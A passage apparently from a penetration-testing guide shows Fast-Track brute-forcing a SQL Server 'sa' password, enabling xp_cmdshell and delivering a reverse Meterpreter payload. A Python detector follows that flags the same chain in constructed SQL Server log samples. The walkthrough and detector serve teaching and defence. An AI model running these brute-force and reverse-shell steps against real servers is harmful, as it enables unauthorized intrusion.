Fast-Track


Brute forcing password of Sqlserver on IP 10.211.55.128:1433
Brute forcing password of SqlServer on IP 10.211.55.128:1433
Brute forcing password of Password1 on IP 10.211.55.128:1433

. . . SNIP . . .

*******************************************
The following SQL Servers were compromised:
*******************************************

1. 10.211.55.128:1433 *** U/N: sa P/W: password ***

*******************************************

To interact with system, enter the SQL Server number.

Example: 1. 192.168.1.32 you would type 1

Enter the number:  

After selecting Attempt SQL Ping and Auto Quick Brute Force, you will be prompted for a SQL database username, followed by the range of IP addresses you want to scan. Answer yes when asked whether you want to perform advanced server identification. Although slow, this can be very effective.

The preceding output shows that Fast-Track successfully brute forced a system with the username of sa and password password. At this point, you can select the payload and compromise the system, as shown here.

Enter number here: 1

Enabling: XP_Cmdshell...
Finished trying to re-enable xp_cmdshell stored procedure if disabled.

Configuration file not detected, running default path.
Recommend running setup.py install to configure Fast-Track.
Setting default directory...
What port do you want the payload to connect to you on: 4444

Metasploit Reverse Meterpreter Upload Detected..
Launching Meterpreter Handler.
Creating Metasploit Reverse Meterpreter Payload..
Sending payload: c88f3f9ac4bbe0e66da147e0f96efd48dad6
Sending payload: ac8cbc47714aaeed2672d69e251cee3dfbad
Metasploit payload delivered..
Converting our payload to binary, this may take a few...
Cleaning up...
Launching payload, this could take up to a minute...
When finished, close the metasploit handler window to return to other 
compromised SQL Servers.
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
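
The session above leaves a recognizable trail in the SQL Server error log: a run of failed sa logins from one client, a successful login from that client, then xp_cmdshell being switched on. The following is an added example, not part of the original text or of Fast-Track. It assumes that auditing of both failed and successful logins is enabled. The log lines are constructed samples in ERRORLOG format, and the function name and threshold are hypothetical.

```python
import re
from collections import defaultdict

# Constructed sample lines in SQL Server ERRORLOG format (not captured from a real host).
SAMPLE_LOG = """\
2011-03-01 10:15:30.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.211.55.2]
2011-03-01 10:15:30.42 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.211.55.2]
2011-03-01 10:15:30.77 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.211.55.2]
2011-03-01 10:15:31.05 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.211.55.2]
2011-03-01 10:15:31.20 Logon       Login succeeded for user 'app'. Connection made using SQL Server authentication. [CLIENT: 10.211.55.9]
2011-03-01 10:15:31.36 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 10.211.55.2]
2011-03-01 10:15:41.77 spid52      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
"""

FAILED = re.compile(r"Login failed for user '(?P<user>[^']+)'\..*\[CLIENT: (?P<ip>[^\]]+)\]")
OK = re.compile(r"Login succeeded for user '(?P<user>[^']+)'\..*\[CLIENT: (?P<ip>[^\]]+)\]")
XP = re.compile(r"Configuration option 'xp_cmdshell' changed from 0 to 1")

def find_bruteforce_chains(log_text, threshold=3):
    """Report each client with >= threshold failed logins followed by a successful
    login for the same account, and whether xp_cmdshell was enabled afterwards."""
    failures = defaultdict(int)   # (client ip, user) -> failed attempts since last success
    findings = []
    for line in log_text.splitlines():
        if m := FAILED.search(line):
            failures[(m["ip"], m["user"])] += 1
        elif m := OK.search(line):
            key = (m["ip"], m["user"])
            if failures[key] >= threshold:
                findings.append({"client": key[0], "user": key[1],
                                 "failed_before_success": failures[key],
                                 "xp_cmdshell_enabled_after": False})
            failures[key] = 0     # a success ends the streak for this client/account
        elif XP.search(line):
            # The config-change line carries no client IP, so flag every earlier finding.
            for f in findings:
                f["xp_cmdshell_enabled_after"] = True
    return findings

if __name__ == "__main__":
    for finding in find_bruteforce_chains(SAMPLE_LOG):
        print(finding)
```
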